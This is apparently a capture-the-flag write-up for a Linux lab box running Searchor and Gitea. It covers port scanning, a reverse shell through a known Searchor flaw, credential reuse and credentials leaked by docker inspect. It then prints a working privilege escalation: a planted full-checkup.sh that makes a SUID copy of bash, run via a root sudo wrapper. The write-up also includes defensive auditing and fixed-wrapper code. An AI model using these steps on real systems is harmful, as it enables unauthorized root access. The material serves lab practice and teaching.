#tryhackme #linux #easy #tjnull #gitea

![[Pasted image 20250803140704.png]]

# Information Gathering - Nmap

I began by scanning all TCP ports and discovered two open ports: 22 and 80.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -Pn -n --open $IP --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 16:07 UTC
Nmap scan report for 10.10.11.208
Host is up (0.054s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds
```

Then another TCP scan against ports 22 and 80 for more information.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sCV $IP -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 16:09 UTC
Nmap scan report for 10.10.11.208
Host is up (0.045s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.69 seconds
```

Lastly, a UDP scan against the top 10 ports.

# Enumeration

##### HTTP - TCP 80

Nmap says it did not follow the redirect to `http://searcher.htb`, so I added the following entry to `/etc/hosts` to map the IP address to the domain.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "10.10.11.208 searcher.htb" | sudo tee -a /etc/hosts
[sudo] password for kali: 
10.10.11.208 searcher.htb
```

As the title of the webpage suggests, the page lets you choose the platform you want to search on and enter what you'd like to search for. If you check the "Auto redirect" option, it immediately redirects you to the corresponding page. If you don't select it, the page returns the platform's URL with the string you intended to search for as a parameter.

![[Pasted image 20250803111214.png]]

![[Pasted image 20250803111732.png]]
![[Pasted image 20250803111741.png]]

At the bottom of the page, I noticed the page was built using `Flask` and `Searchor 2.4.0`.

![[Pasted image 20250803112754.png]]

# Initial Access - shell as `svc`

I looked up `Searcher 2.4.0 exploit site:github.com` on Google and found a known vulnerability for this version.

![[Pasted image 20250803112906.png]]

Got a reverse shell as the `svc` user.

![[Pasted image 20250803113943.png]]

Found `user.txt` in `/home/svc`.

```bash
svc@busqueda:~$ ls
user.txt
svc@busqueda:~$ cat user.txt
630...
```

# Privilege Escalation

The `ls -la` command revealed a `.gitconfig` file.

```bash
svc@busqueda:~$ ls -la
total 44
drwxr-x--- 6 svc  svc  4096 Aug  2 17:01 .
drwxr-xr-x 3 root root 4096 Dec 22  2022 ..
lrwxrwxrwx 1 root root    9 Feb 20  2023 .bash_history -> /dev/null
-rw-r--r-- 1 svc  svc   220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 svc  svc  3771 Jan  6  2022 .bashrc
drwx------ 2 svc  svc  4096 Feb 28  2023 .cache
-rw-rw-r-- 1 svc  svc    76 Apr  3  2023 .gitconfig
drwx------ 3 svc  svc  4096 Aug  2 17:04 .gnupg
drwxrwxr-x 5 svc  svc  4096 Jun 15  2022 .local
lrwxrwxrwx 1 root root    9 Apr  3  2023 .mysql_history -> /dev/null
-rw-r--r-- 1 svc  svc   807 Jan  6  2022 .profile
lrwxrwxrwx 1 root root    9 Feb 20  2023 .searchor-history.json -> /dev/null
drwx------ 3 svc  svc  4096 Aug  2 16:59 snap
-rw-r----- 1 root svc    33 Aug  2 16:06 user.txt
svc@busqueda:~$ cat .gitconfig
[user]
	email = [email protected]
	name = cody
[core]
	hooksPath = no-hooks
```

I spent a lot of time trying to find a lead for PrivEsc. Then I revisited the `/var/www` directory, listed all directories and files including hidden ones, and found a `.git` directory. I can't believe I didn't think to list all the files in `/var/www` earlier.

```bash
svc@busqueda:/var/www/app$ ls -la
total 20
drwxr-xr-x 4 www-data www-data 4096 Apr  3  2023 .
drwxr-xr-x 4 root     root     4096 Apr  4  2023 ..
-rw-r--r-- 1 www-data www-data 1124 Dec  1  2022 app.py
drwxr-xr-x 8 www-data www-data 4096 Aug  2 16:06 .git
drwxr-xr-x 2 www-data www-data 4096 Dec  1  2022 templates
```

In `/var/www/app/.git/config`, `gitea` is mentioned. Let's update our `/etc/hosts` file by adding `gitea.searcher.htb`.

![[Pasted image 20250803122152.png]]

![[Pasted image 20250803122819.png]]

I logged in as `cody` with the credentials found in the git config.

![[Pasted image 20250803122854.png]]

But the repo didn't have much interesting information.
![[Pasted image 20250803122950.png]]

I wanted to run `sudo -l` to see whether the current user can run any commands with `sudo` privileges, but it prompted for a password, and I did not know the password of the `svc` user. I tried Cody's password and it worked! I didn't think to try Cody's password for the `svc` user, but it makes sense that `svc` and Cody are probably the same person, because `/etc/passwd` doesn't list `cody`.

```bash
svc@busqueda:/var/www/app/.git$ sudo -l
[sudo] password for svc: 
Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *
svc@busqueda:/var/www/app/.git$ 
```

The current user can only execute `/opt/scripts/system-checkup.py`; it cannot read or write it.

```bash
svc@busqueda:/var/www/app/.git$ cat /opt/scripts/system-checkup.py
cat: /opt/scripts/system-checkup.py: Permission denied
svc@busqueda:/var/www/app/.git$ ls -l /opt/scripts/system-checkup.py
-rwx--x--x 1 root root 1903 Dec 24  2022 /opt/scripts/system-checkup.py
```

It also cannot be run without arguments, so I tried `test` as an argument and it returned the following:

```bash
svc@busqueda:/var/www/app/.git$ sudo python3 /opt/scripts/system-checkup.py test
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup

svc@busqueda:/var/www/app/.git$ 
```

`docker-ps` as the argument returned two running docker containers.
```bash
svc@busqueda:/var/www/app/.git$ sudo python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID   IMAGE                COMMAND                  CREATED       STATUS       PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   2 years ago   Up 2 hours   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   2 years ago   Up 2 hours   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db
```

The `docker-inspect` action requires a `format` and a `container_name`.

```bash
svc@busqueda:/var/www/app/.git$ sudo python3 /opt/scripts/system-checkup.py docker-inspect
Usage: /opt/scripts/system-checkup.py docker-inspect <format> <container_name>
```

`full-checkup` returns "Something went wrong".

```bash
svc@busqueda:/var/www/app/.git$ sudo python3 /opt/scripts/system-checkup.py full-checkup
Something went wrong
```

I searched for `docker inspect format` and the official Docker documentation came up. I decided to print all of the contents as JSON with the format `{{json .}}`.

![[Pasted image 20250803130044.png]]

![[Pasted image 20250803130108.png]]

I piped the command into `jq` to prettify the JSON output.

`sudo python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea | jq .`

![[Pasted image 20250803125951.png]]

As I scrolled down through the output, I found the Gitea DB credentials. There was also the `mysql_db` docker container, so let's check that out.

![[Pasted image 20250803130417.png]]

`sudo python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' mysql_db | jq .` revealed the MySQL root password. This might also be the password of `root`, so let's test it.

![[Pasted image 20250803130620.png]]

It wasn't the password for `root`:

```bash
svc@busqueda:/var/www/app/.git$ su root
Password: 
su: Authentication failure
```

But it was the password for the MySQL `root` user:

```bash
svc@busqueda:/var/www/app/.git$ mysql -h 127.0.0.1 -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 306
Server version: 8.0.31 MySQL Community Server - GPL

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 
```

The `show databases;` command revealed there is a `gitea` DB.

```bash
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| gitea              |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.03 sec)

mysql> use gitea;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
```

This DB contains a lot of tables, but the one I'm interested in is the table named `user`.

```bash
mysql> show tables;
+---------------------------+
| Tables_in_gitea           |
+---------------------------+
| access                    |
| access_token              |
| action                    |
| app_state                 |
| attachment                |
...
<SNIP>
```

The table included credentials for `cody` and `administrator`.

![[Pasted image 20250803131329.png]]

Before cracking the password hash, and now that I had found more passwords, I navigated back to `Gitea` and tried logging in as `administrator`.

![[Pasted image 20250803132240.png]]

Successfully logged in as `administrator` on `Gitea`.

![[Pasted image 20250803132300.png]]

The `system-checkup.py` source shows why `full-checkup` failed to run: it executes the `full-checkup.sh` file through a relative path, so the command only works without error when you run it from the same directory as that file.

![[Pasted image 20250803133102.png]]

When I cd'd into `/opt/scripts` and ran `full-checkup`, it worked just fine.
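The `docker-inspect` output above leaked both the Gitea DB and MySQL root credentials because they live in the containers' environment. As an added example (not the box's script or the author's code), this audit helper takes `docker inspect` JSON (either the full array or the single object that `{{json .}}` prints), reports which env vars look like secrets, and masks their values so the audit log does not leak them again. The sample input and its env key names are constructed placeholders in the shape of the page's two containers.

```python
import json
import re

# Env keys that usually carry credentials; extend to taste.
SECRET_KEY_RE = re.compile(r"(PASS(WORD|WD)?|SECRET|TOKEN|API_?KEY)", re.IGNORECASE)

# Constructed sample in the shape `docker inspect` prints (a JSON array of
# container objects). Values are placeholders, not the box's real secrets.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/gitea",
     "Config": {"Env": ["USER_UID=115", "GITEA__database__DB_TYPE=mysql",
                        "GITEA__database__PASSWD=<placeholder>", "PATH=/usr/bin"]}},
    {"Name": "/mysql_db",
     "Config": {"Env": ["MYSQL_ROOT_PASSWORD=<placeholder>",
                        "MYSQL_DATABASE=gitea", "GOSU_VERSION=1.14"]}},
])


def mask(value: str) -> str:
    """Report only the length so the audit output does not itself leak the secret."""
    return f"<{len(value)} chars>"


def find_env_secrets(inspect_output: str) -> list[tuple[str, str, str]]:
    """Return (container, key, masked value) for every secret-looking env var.

    Accepts the array `docker inspect` prints or a single object such as the
    one `docker inspect --format '{{json .}}' <name>` prints.
    """
    data = json.loads(inspect_output)
    containers = data if isinstance(data, list) else [data]
    findings = []
    for container in containers:
        name = container.get("Name", "?").lstrip("/")
        for entry in container.get("Config", {}).get("Env", []):
            key, sep, value = entry.partition("=")
            if sep and SECRET_KEY_RE.search(key):
                findings.append((name, key, mask(value)))
    return findings


if __name__ == "__main__":
    for name, key, masked in find_env_secrets(SAMPLE_INSPECT):
        print(f"{name}: {key}={masked}")
```

On a real host, feed it `docker inspect $(docker ps -q)`; any hit is a credential readable by everyone who can reach the Docker socket or a root-run wrapper like `system-checkup.py`.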
![[Pasted image 20250803134257.png]]

To exploit this, my own `full-checkup.sh` in `/tmp` copies `/bin/bash` to `/tmp/wook`, gives the file full permissions and sets the SUID bit. Simply put, when `full-checkup.sh` is run as root, it creates the `wook` file in `/tmp` with the SUID bit set, which means anyone who runs that file runs it with root privileges.

```bash
svc@busqueda:/tmp$ echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/wook\nchmod 4777 /tmp/wook' > full-checkup.sh
svc@busqueda:/tmp$ cat full-checkup.sh
#!/bin/bash

cp /bin/bash /tmp/wook
chmod 4777 /tmp/wook
svc@busqueda:/tmp$ chmod +x full-checkup.sh
svc@busqueda:/tmp$ ls
full-checkup.sh
```

As you can see, `wook` is created with full permissions and the SUID bit set.

![[Pasted image 20250803135403.png]]

I ran it with the `-p` option so bash does not drop the elevated privileges.

```bash
svc@busqueda:/tmp$ ./wook -p
wook-5.1# whoami
root
```

Got `root.txt`.

```bash
wook-5.1# cd /root
wook-5.1# ls
ecosystem.config.js  root.txt  scripts  snap
wook-5.1# cat root.txt
6a1...
```
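The root cause is a root-run script resolving `full-checkup.sh` against the caller's working directory. As an added example (the box's real `system-checkup.py` is not shown on this page, so its layout is assumed), the snippet below puts the vulnerable pattern beside a fixed version that resolves the helper relative to the script's own location and refuses to run it unless it is root-owned, not a symlink, and not writable by group or others.

```python
import os
import stat
import subprocess

# Assumed layout: the wrapper lives in /opt/scripts next to the helper it runs,
# so resolve the helper relative to this file, never to the caller's cwd.
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKUP_SCRIPT = os.path.join(SCRIPT_DIR, "full-checkup.sh")


def trust_problems(path: str, expected_uid: int = 0) -> list[str]:
    """Reasons a helper must not be executed with root privileges (empty list = OK)."""
    problems = []
    try:
        st = os.lstat(path)  # lstat so a symlink is judged by itself, not its target
    except FileNotFoundError:
        return ["missing"]
    if stat.S_ISLNK(st.st_mode):
        problems.append("is a symlink")
    if st.st_uid != expected_uid:
        problems.append(f"not owned by uid {expected_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("writable by group or others")
    return problems


def run_full_checkup_vulnerable() -> subprocess.CompletedProcess:
    # The pattern the page describes: "./full-checkup.sh" resolves against the
    # caller's cwd, so `cd /tmp && sudo ... full-checkup` runs /tmp/full-checkup.sh as root.
    return subprocess.run(["./full-checkup.sh"], capture_output=True, text=True)


def run_full_checkup_fixed() -> subprocess.CompletedProcess:
    # Absolute path plus ownership/permission checks on the helper and its directory.
    for candidate in (SCRIPT_DIR, CHECKUP_SCRIPT):
        problems = trust_problems(candidate)
        if problems:
            raise PermissionError(f"{candidate}: {', '.join(problems)}")
    return subprocess.run([CHECKUP_SCRIPT], capture_output=True, text=True)


if __name__ == "__main__":
    print(trust_problems(CHECKUP_SCRIPT) or "helper looks safe to run")
```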